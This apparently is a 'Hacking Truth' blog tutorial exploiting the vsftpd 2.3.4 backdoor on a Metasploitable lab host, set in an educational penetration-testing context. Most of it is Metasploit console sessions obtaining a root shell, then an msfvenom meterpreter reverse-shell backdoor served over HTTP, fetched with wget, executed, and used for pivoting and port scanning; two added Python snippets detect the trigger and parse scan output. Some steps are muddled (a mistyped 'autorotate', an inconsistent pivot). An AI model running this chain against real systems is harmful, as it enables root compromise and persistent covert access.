The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious code path, which results in a backdoor shell listening on port 6200 of the system.



Let's Exploit


The following excerpt from the vulnerable source code will make things much clearer:



-    else if((p_str->p_buf[i]==0x3a)
- && (p_str->p_buf[i+1]==0x29))
- {
- vsf_sysutil_extra();
- }
}



 

We can clearly see that if two adjacent bytes in the network buffer match the backdoor sequence 0x3a (a colon) followed by 0x29 (a closing parenthesis), i.e. the smiley ":)", the malicious function is triggered.

Furthermore, if we explore the details of the malicious function, we can see the following function definition for it:




The full function definition is available at https://pastebin.com/AetT9sS5




In that function, sa.sin_port=6200 sets the backdoor port, and every command sent to that port is executed by the shell spawned with execl("/bin/sh","sh",(char *)0);.
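The two-byte comparison in the snippet above is also exactly what a network sensor or log review can look for on the FTP control channel. The following Python snippet is an added example, not taken from the report or from vsftpd, and shows the defender's side of the same logic: it reproduces the 0x3a/0x29 check on captured USER commands and flags the affected version banner, so an attempt to trip the backdoor shows up in the logs. The session lines are constructed, and `contains_trigger` and `inspect_session` are names I chose.

```python
BACKDOOR_TRIGGER = bytes([0x3a, 0x29])   # ':' followed by ')', the pair the vsftpd snippet tests
AFFECTED_BANNER = b"220 (vsFTPd 2.3.4)"   # greeting of the affected release
BACKDOOR_PORT = 6200                      # port the spawned shell listens on

# Constructed sample: FTP control-channel lines as a sensor might record them
# (server replies and client commands interleaved, CRLF terminated).
SAMPLE_FTP_SESSION = [
    b"220 (vsFTPd 2.3.4)\r\n",
    b"USER alice\r\n",
    b"331 Please specify the password.\r\n",
    b"PASS s3cret\r\n",
    b"USER guest:)\r\n",
    b"331 Please specify the password.\r\n",
]


def contains_trigger(buf: bytes) -> bool:
    """Mirror of the vsftpd check: is 0x3a immediately followed by 0x29 anywhere in buf?"""
    for i in range(len(buf) - 1):
        if buf[i] == 0x3a and buf[i + 1] == 0x29:
            return True
    return False


def inspect_session(lines):
    """Return one alert string per suspicious line of a captured FTP control session."""
    alerts = []
    for line in lines:
        if line.startswith(AFFECTED_BANNER):
            alerts.append("banner: server announces vsFTPd 2.3.4, the release whose "
                          "download archive was backdoored; verify the installed package")
        # Only the USER argument reaches the backdoored comparison before login.
        if line[:5].upper() == b"USER " and contains_trigger(line):
            alerts.append(f"trigger: USER argument {line.strip()!r} contains bytes 0x3a 0x29; "
                          f"check the host for an unexpected listener on TCP/{BACKDOOR_PORT}")
    return alerts


if __name__ == "__main__":
    for alert in inspect_session(SAMPLE_FTP_SESSION):
        print(alert)
```

A normal username never contains ":)", so a USER line that does is a high-confidence signal on its own; pairing it with the 2.3.4 banner tells the responder which hosts to check for the port 6200 listener first.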



Vulnerability analysis of VSFTPD 2.3.4 backdoor


After modeling the threat, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and review the vulnerability details using the info command, as follows:



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > search vsftpd

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 >
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info

Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03

Provided by:
hdm
MC

Available targets:
Id Name
-- ----
0 Automatic

Check supported:
No

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 21 yes The target port (TCP)

Payload information:
Space: 2000
Avoid: 0 characters

Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.

References:
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >




Now we set RHOST and RPORT, list and select the payload, verify these options, and finally run the exploit.



msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >



As you can see, once the target is exploited we can do many things on it, but there is one problem: how do we maintain access after this exploitation? When we exit the session it is destroyed, and we have to run the exploit again to regain access or run a command.



msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

ls -la
total 125
drwxr-xr-x 21 root root 4096 May 20 2012 .
drwxr-xr-x 21 root root 4096 May 20 2012 ..
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13500 Jul 9 13:48 dev
drwxr-xr-x 94 root root 4096 Jul 9 14:41 etc
drwxr-xr-x 7 root root 4096 Jun 2 05:32 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw------- 1 root root 41871 Jul 9 13:49 nohup.out
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
dr-xr-xr-x 118 root root 0 Jul 9 13:48 proc
drwxr-xr-x 13 root root 4096 Jul 9 13:49 root
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 12 root root 0 Jul 9 13:48 sys
drwxrwxrwt 4 root root 4096 Jul 9 14:07 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 14 root root 4096 Mar 17 2010 var
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server



Post Exploitation

Having understood this vulnerability and gained access, let us now exploit it once again, this time with the goal of keeping persistent, covert control of the target. Let us see what options we need to set before firing the exploit at the target; we can do this by running the show options command, as shown below.




msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact




We can see that we have only two options, RHOST and RPORT. We set RHOST to the IP address of the target and RPORT to 21, which is the port of the vulnerable FTP server.


Next we can check for the matching payloads via the show payloads command to see which payloads are suitable for this particular exploit module. We can see only a single payload, payload/cmd/unix/interact, which we select with the set payload cmd/unix/interact command.




msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/



Voila! We got root access to the target system. So, what's next? Since we have only a simple command shell, let us try to gain better control over the target by spawning a meterpreter shell.


In order to maintain access with a meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. So, let's get started.

 

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

Here 192.168.43.152 is our own (attacking) machine's IP address.




┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf
[sudo] password for hackerboy:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
backdoor.elf ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding output. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number, which the backdoor.elf file will connect back to in order to give us meterpreter access to the target. The -f switch defines the output format, and elf is the native executable format on Linux-based systems.

 

What happens next? Do we walk over to the victim's system and do the post-exploitation there? No, nothing like that: we will reach the meterpreter shell through the exploit we already have and, with the help of the Apache server on our own system, deliver the backdoor to the victim's system.

 

If the victim is on another network, away from you, you can host the file on a server that the target can reach and download it from there onto the target machine.



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo service apache2 start
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo mv backdoor.elf /var/www/html/
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



We start the Apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


whoami
root
pwd
/


wget http://192.168.43.152/backdoor.elf
--16:06:29-- http://192.168.43.152/backdoor.elf
=> `backdoor.elf'
Connecting to 192.168.43.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

0K 100% 7.65 MB/s

16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]



We can download the file via the wget command, as shown in the preceding output. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will accept the connection from the target using the same port and payload we used in the backdoor.elf file.



Alternatively (a second method to deliver the backdoor file to the victim machine)

 

We can serve the backdoor to the victim's machine with Python's http.server module, like this:


 

┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
└─$ python3 -m http.server 1234 1 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
 
 

 

Then, on the victim's machine, we fetch the backdoor file with the wget command:



whoami
root
pwd
/

wget http://127.0.0.1/backdoor.elf

--2021-07-10 00:47:02-- http://127.0.0.1/backdoor.elf
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: ‘backdoor.elf’

backdoor.elf 100%[===========================================================>] 207 --.-KB/s in 0s

2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]




We issue use exploit/multi/handler in a separate Metasploit terminal and set the payload type to linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST to our local IP address. We can now run the module using the exploit command and wait for the incoming connection.



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.43.152
LHOST => 192.168.43.152
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler...



After downloading the file onto the target, we give it the required permissions via the chmod command, as shown below:



chmod 777 backdoor.elf




ls -la
total 129
drwxr-xr-x 21 root root 4096 Jul 9 16:18 .
drwxr-xr-x 21 root root 4096 Jul 9 16:18 ..
-rwxrwxrwx 1 root root 207 Jul 9 16:17 backdoor.elf
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13500 Jul 9 15:53 dev
drwxr-xr-x 94 root root 4096 Jul 9 16:19 etc
drwxr-xr-x 7 root root 4096 Jun 2 05:32 home
....


./backdoor.elf


Providing the 777 permission grants read, write, and execute permissions on the file to everyone. Execute the file, and then switch to the other terminal, which is running our exploit handler:



msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444
[*] Sending stage (984904 bytes) to 192.168.43.120
[*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530

meterpreter >



We got it: we have meterpreter shell access to the target. Let's find some interesting information using the post-exploitation modules:




meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
meterpreter > ifconfig



Running the sysinfo command, we can see that the target is Metasploitable (an intentionally vulnerable operating system based on Ubuntu 8.04), its architecture is i686, and the kernel version is 2.6.24-16.



meterpreter > 
meterpreter > ifconfig

Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:67:67:30
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.43.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter >



Running the ifconfig command on the target, we see some interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems reside. We run the arp command on the target to check whether any systems are, or were recently, connected to the exploited system from the internal network, as shown in the following output:



meterpreter > arp

ARP cache
=========

IP address MAC address Interface
---------- ----------- ---------
192.168.43.152 fc:01:7c:29:00:77

meterpreter >



We can clearly see an additional system with IP address 192.168.43.120 on the internal network. To reach the internal network, we need to set up pivoting on the exploited machine using the autoroute command.



meterpreter > run autoroute -p

[*] No routes have been added yet
meterpreter >



meterpreter > run autorotate -s 192.168.43.120 255.255.255.0

[*] Adding a route to 192.168.43.120/255.255.255.0...
[+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120
[*] Use the -p option to list all active routes

meterpreter > run autorotate -p

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.43.120 255.255.255.0 Session 1

meterpreter >



The autoroute -p command prints all the routing information for a session. We can see that we do not have any routes by default. Let us add a route to the target's internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. After issuing this command, we can see that the route was successfully added to the routing table, and now all communication from Metasploit to the internal network will pass through our meterpreter session.

Let us now put the meterpreter session in the background by using the background command as follows:



meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > hosts

Hosts
=====

address         mac                name            os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----            -------  ---------  -----  -------  ----  --------
192.168.43.120  fc:01:7c:29:00:77  metasploitable  Linux                      Server



msf6 exploit(multi/handler) >




Since the internal network is now reachable, let us perform a port scan of the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp module, as follows:



msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CONCURRENCY  10               yes       The number of concurrent ports to check per host
DELAY        0                yes       The delay between connections, per thread, in milliseconds
JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS      1                yes       The number of concurrent threads (max one per host)
TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
RHOSTS => 192.168.43.0
msf6 auxiliary(scanner/portscan/tcp) > run

[*] 192.168.43.0: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.43.120: - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:25 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:53 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:111 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:139 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:445 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:514 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:512 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1099 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1524 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:2049 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:2121 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3632 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5432 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5900 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6000 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6200 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6667 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6697 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8009 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8180 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8787 - TCP OPEN
[*] 192.168.43.120: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >



Running the port scan module requires us to set the RHOSTS option to the target's IP address with setg RHOSTS 192.168.43.120. The setg command sets the RHOSTS value globally to 192.168.43.120, which eliminates the need to retype set RHOSTS for each subsequent module.

To run this module, we issue the run command. The output shows multiple services running on the 192.168.43.120 system; among them, port 80 is open. Let us try to fingerprint the service on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT    80               yes       The target port (TCP)
SSL      false            no        Negotiate SSL/TLS for outgoing connections
THREADS  1                yes       The number of concurrent threads (max one per host)
VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/http/http_version) > run

[+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >



Running the auxiliary module, we find that the service on port 80 is the popular Apache 2.2.8 web server, with PHP 5.2.4 reported in the banner. Searching public advisories, we find that PHP version 5.2.4 has known vulnerabilities that can allow an attacker to gain access to the target system.
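The port scan output and the http_version banner above are the raw material of the report. As an added example (not part of the original post), the Python below parses both into structured findings: it reads the "[+] host:port - TCP OPEN" lines, flags the IANA-assigned cleartext services among the open ports for remediation, and splits the banner into product/version pairs. The sample scan lines are a constructed subset of the report's own output.

```python
import re
from collections import defaultdict

# Constructed sample in the format of the auxiliary/scanner/portscan/tcp output
# above (a subset of the ports, not the full list from the report).
SCAN_OUTPUT = """\
[+] 192.168.43.120: - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5900 - TCP OPEN
[*] 192.168.43.120: - Scanned 1 of 1 hosts (100% complete)
"""

# The http_version banner printed for port 80 in the report.
BANNER = "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )"

# IANA-assigned services that carry credentials or sessions in cleartext; a
# report should call these out for removal or wrapping in an encrypted transport.
CLEARTEXT = {21: "ftp", 23: "telnet", 512: "exec", 513: "login", 514: "shell",
             5900: "vnc", 6000: "x11"}

# "[+] <host>: - <host>:<port> - TCP OPEN"; the backreference requires both host
# fields to agree, so a garbled line is skipped rather than mis-attributed.
OPEN_RE = re.compile(r"^\[\+\] (\d+\.\d+\.\d+\.\d+): - \1:(\d+) - TCP OPEN$")
# "<product>/<version>" tokens, e.g. Apache/2.2.8 or PHP/5.2.4-2ubuntu5.10
PRODUCT_RE = re.compile(r"([A-Za-z][\w-]*)/([\w.+-]+)")

def parse_portscan(text):
    """Return {host: sorted open ports} from portscan/tcp console output."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = OPEN_RE.match(line.strip())
        if m:
            hosts[m.group(1)].add(int(m.group(2)))
    return {h: sorted(p) for h, p in hosts.items()}

def parse_banner(banner):
    """Return {product: version} for every product/version token in a banner."""
    return dict(PRODUCT_RE.findall(banner))

def findings(scan_text, banner, banner_port=80):
    """Join both parsers into (host, port, note) rows for the report."""
    rows = []
    for host, ports in parse_portscan(scan_text).items():
        for port in ports:
            if port in CLEARTEXT:
                rows.append((host, port, f"cleartext service {CLEARTEXT[port]} exposed"))
            if port == banner_port:
                for product, version in parse_banner(banner).items():
                    rows.append((host, port, f"{product} {version} disclosed in banner"))
    return rows
```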


Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.

  - Hacking Truth by Kumar Atul Jaiswal


